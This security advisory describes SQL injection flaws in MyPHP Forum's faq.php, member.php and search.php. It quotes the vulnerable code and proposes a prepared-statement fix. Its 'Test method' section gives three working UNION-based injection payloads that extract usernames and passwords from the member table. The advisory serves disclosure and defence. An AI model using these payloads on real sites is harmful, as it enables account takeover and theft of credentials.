MyPHP Forum is an easy-to-deploy, easy-to-use forum built on MySQL and PHP.
MyPHP Forum fails to validate user-supplied request data, and a remote attacker can exploit this to perform SQL injection attacks.
The faq.php script does not properly validate the id parameter, member.php does not properly validate the member parameter, and search.php does not properly validate the searchtext and searchuser parameters, so an attacker can inject arbitrary SQL and take control of the resulting queries. Successful exploitation requires magic_quotes_gpc to be disabled.
Vulnerable code in faq.php:
    <?php
    //faq.php
    [...]
    $id = $_GET['id'];
    if($action == "view" && !empty($id)) {
        $result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D
        $row = mysql_fetch_array($result);
        $row[answer] = postify($row[answer]);
    [...]
    ?>
Vulnerable code in member.php:
    <?php
    //member.php
    [...]
    if($action == "viewpro") {
        $member = $HTTP_GET_VARS['member'];
        $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
    [...]
    ?>
Vulnerable code in search.php:
    if($_POST['submit']) {
        $searchtext = $_POST['searchtext'];
        $searchuser = $_POST['searchuser'];

        if(!strstr($searchtext, '"')) {
            $keywords = explode(" ", $searchtext);
            for($i = 0; $i < count($keywords); $i++) {
                if($sqladdon != "") {
                    $sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
                } else {
                    $sqladdon .= "p.message LIKE '%$keywords[$i]%'";
                }
            }
        } else {
            $phrase = trim(stripslashes(strstr($searchtext, '"')));
            $quotesarr = explode('"', $phrase);
            $quotes = count($quotesarr);
            $phrasecount = $quotes - (count(explode('" "', $phrase)) + 1);

            for($i = 0; $i < $quotes; $i++) {
                if($i != 0 && $i != $quotes - 1) {
                    if($phraseoff != "yes") {
                        $phraselist .= "$quotesarr[$i]|";
                        $phraseoff = "yes";
                    } else {
                        $phraseoff = "no";
                    }
                }
            }

            $phrasearr = explode("|", $phraselist);
            $phrases = count($phrasearr) - 1;

            for($i = 0; $i < $phrases; $i++) {
                if($sqladdon != "") {
                    $sqladdon .= " AND p.message LIKE '%$phrasearr[$i]%'";
                } else {
                    $sqladdon .= "p.message LIKE '%$phrasearr[$i]%'";
                }
            }
            $newsearchtxt = trim(str_replace("$phrase", "", stripslashes($searchtext)));

            if($newsearchtxt != "") {
                $keywords = explode(" ", $newsearchtxt);
            }

            for($i = 0; $i < count($keywords); $i++) {
                if($sqladdon != "") {
                    $sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
                } else {
                    $sqladdon .= "p.message LIKE '%$keywords[$i]%'";
                }
            }
        }

        if($searchuser != "") {
            if($sqladdon != "") {
                $sqladdon .= " AND p.author LIKE '%$searchuser%'";
            } else {
                $sqladdon .= "p.author LIKE '%$searchuser%'";
            }
        }

        if($sqladdon != "" ) {
            search_header();
            $ttnum = 1;
            // Now the Vulnerable Query =)
            $query = mysql_query("SELECT t.*, f.name AS forum FROM $db_post p, $db_topic t, $db_forum f WHERE $sqladdon AND t.tid=p.tid AND f.fid=t.fid") or die(mysql_error());
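The common defect in all three scripts is that request values are interpolated straight into the SQL string. One way to close that, as an added PHP example that is not MyPHP Forum's own code: bind the values with PDO prepared statements and keep the dynamic search clause made of placeholders only. It assumes an existing PDO connection `$pdo`, and that the `$db_*` table-name variables come from the forum's trusted configuration rather than from the request.

```php
<?php
// Added example, not MyPHP Forum code: the queries above rebuilt with PDO prepared
// statements so user input is bound as data, never spliced into SQL. $pdo is an
// assumed existing PDO connection; table names come from the forum's own config.

// faq.php: id is a numeric key, so reject non-integers before they reach MySQL.
function fetchFaq(PDO $pdo, string $db_faq, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                       // "-1' UNION ..." never becomes SQL
    }
    $stmt = $pdo->prepare("SELECT * FROM `$db_faq` WHERE id = ?");
    $stmt->execute([$id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// LIKE pattern for one term: wildcards go on the value, and a user-supplied
// %, _ or ! is escaped so a search term cannot widen the match.
function likeTerm(string $term): string
{
    return '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term) . '%';
}

// search.php: the WHERE clause is built from placeholders only; the keyword and
// author values travel in the parameter array instead of inside $sqladdon.
function buildSearch(array $keywords, string $searchuser): array
{
    $clauses = [];
    $params  = [];
    foreach ($keywords as $kw) {
        if (trim($kw) === '') { continue; }
        $clauses[] = "p.message LIKE ? ESCAPE '!'";
        $params[]  = likeTerm(trim($kw));
    }
    if ($searchuser !== '') {
        $clauses[] = "p.author LIKE ? ESCAPE '!'";
        $params[]  = likeTerm($searchuser);
    }
    return [implode(' AND ', $clauses), $params];
}

// search.php, after the keyword/phrase parsing shown above (only when $where !== ''):
// [$where, $params] = buildSearch($keywords, $searchuser);
// $stmt = $pdo->prepare("SELECT t.*, f.name AS forum FROM `$db_post` p, `$db_topic` t, `$db_forum` f WHERE $where AND t.tid = p.tid AND f.fid = t.fid");
// $stmt->execute($params);
```

The member.php username lookup takes the same `?` binding as fetchFaq, without the integer check, since a username is free text that cannot be validated away.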
<*Source: x0kster (x0kster@gmail.com) The:Paradox
Links: http://secunia.com/advisories/28280/
http://milw0rm.com/exploits/4831
http://milw0rm.com/exploits/4822 *>
Test method:
Warning
The following programs (methods) may be of an offensive nature and are provided for security research and teaching purposes only. Use at your own risk!

submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*"

http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*

http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*
Recommendation:
Vendor patch:
MyPHP.ws
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.myphp.ws/